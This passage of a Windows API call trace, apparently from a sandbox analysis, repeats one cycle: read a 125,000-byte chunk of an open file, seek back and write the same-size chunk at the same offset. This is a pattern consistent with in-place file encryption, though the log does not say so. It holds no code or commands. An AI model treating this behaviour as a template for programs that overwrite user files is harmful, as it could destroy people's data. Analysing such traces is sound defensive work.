lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.974] GetProcessHeap () returned 0x500000 [0115.974] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.974] GetProcessHeap () returned 0x500000 [0115.974] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.974] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x361efb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.974] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.991] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x361efb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.991] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.992] GetProcessHeap () returned 0x500000 [0115.992] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.992] GetProcessHeap () returned 0x500000 [0115.992] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.992] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x365c040, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.992] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.003] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x365c040, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.003] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.004] GetProcessHeap () returned 0x500000 [0116.004] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.004] GetProcessHeap () returned 0x500000 [0116.004] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.004] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x36990d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.004] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.016] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x36990d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.016] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.017] GetProcessHeap () returned 0x500000 [0116.017] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.017] GetProcessHeap () returned 0x500000 [0116.017] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.017] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x36d6160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.017] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.035] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x36d6160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.035] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.035] GetProcessHeap () returned 0x500000 [0116.036] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.036] GetProcessHeap () returned 0x500000 [0116.036] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.036] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x37131f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.036] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.056] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x37131f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.056] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.057] GetProcessHeap () returned 0x500000 [0116.057] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.057] GetProcessHeap () returned 0x500000 [0116.057] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.057] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3750280, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.057] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.067] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3750280, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.068] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.068] GetProcessHeap () returned 0x500000 [0116.068] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.068] GetProcessHeap () returned 0x500000 [0116.068] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.068] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x378d310, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.068] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.079] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x378d310, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.079] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.080] GetProcessHeap () returned 0x500000 [0116.080] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.080] GetProcessHeap () returned 0x500000 [0116.080] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.080] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x37ca3a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.080] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.119] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x37ca3a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.120] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.120] GetProcessHeap () returned 0x500000 [0116.120] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.120] GetProcessHeap () returned 0x500000 [0116.120] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.121] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3807430, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.121] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.188] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3807430, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.188] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.188] GetProcessHeap () returned 0x500000 [0116.188] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.188] GetProcessHeap () returned 0x500000 [0116.189] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.189] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x38444c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.189] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.197] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x38444c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.197] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.198] GetProcessHeap () returned 0x500000 [0116.198] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.198] GetProcessHeap () returned 0x500000 [0116.198] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.198] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3881550, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.198] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.209] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3881550, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.209] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.209] GetProcessHeap () returned 0x500000 [0116.209] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.209] GetProcessHeap () returned 0x500000 [0116.209] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.210] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x38be5e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.210] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.271] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x38be5e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.271] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.272] GetProcessHeap () returned 0x500000 [0116.272] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.272] GetProcessHeap () returned 0x500000 [0116.272] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.272] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x38fb670, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.272] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.290] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x38fb670, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.290] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.292] GetProcessHeap () returned 0x500000 [0116.292] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.292] GetProcessHeap () returned 0x500000 [0116.292] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.292] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3938700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.292] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.301] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3938700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.301] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.302] GetProcessHeap () returned 0x500000 [0116.302] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.302] GetProcessHeap () returned 0x500000 [0116.302] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.302] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3975790, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.302] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.328] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3975790, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.328] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.329] GetProcessHeap () returned 0x500000 [0116.329] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.329] GetProcessHeap () returned 0x500000 [0116.329] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.329] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x39b2820, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.329] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.341] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x39b2820, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.341] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.341] GetProcessHeap () returned 0x500000 [0116.341] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.341] GetProcessHeap () returned 0x500000 [0116.341] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.341] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x39ef8b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.360] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x39ef8b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.360] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.362] GetProcessHeap () returned 0x500000 [0116.362] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.362] GetProcessHeap () returned 0x500000 [0116.362] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.362] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3a2c940, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.362] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.439] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3a2c940, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.439] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.440] GetProcessHeap () returned 0x500000 [0116.440] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.440] GetProcessHeap () returned 0x500000 [0116.440] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.440] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3a699d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.440] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.450] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3a699d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.450] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.451] GetProcessHeap () returned 0x500000 [0116.451] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.451] GetProcessHeap () returned 0x500000 [0116.451] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.451] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3aa6a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.451] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.462] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3aa6a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.462] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.463] GetProcessHeap () returned 0x500000 [0116.463] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.463] GetProcessHeap () returned 0x500000 [0116.463] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.463] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3ae3af0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.463] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.503] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3ae3af0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.503] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.505] GetProcessHeap () returned 0x500000 [0116.505] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.505] GetProcessHeap () returned 0x500000 [0116.505] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.505] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3b20b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.505] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.515] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3b20b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.515] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.516] GetProcessHeap () returned 0x500000 [0116.516] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.516] GetProcessHeap () returned 0x500000 [0116.516] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.516] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3b5dc10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.516] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.527] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3b5dc10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 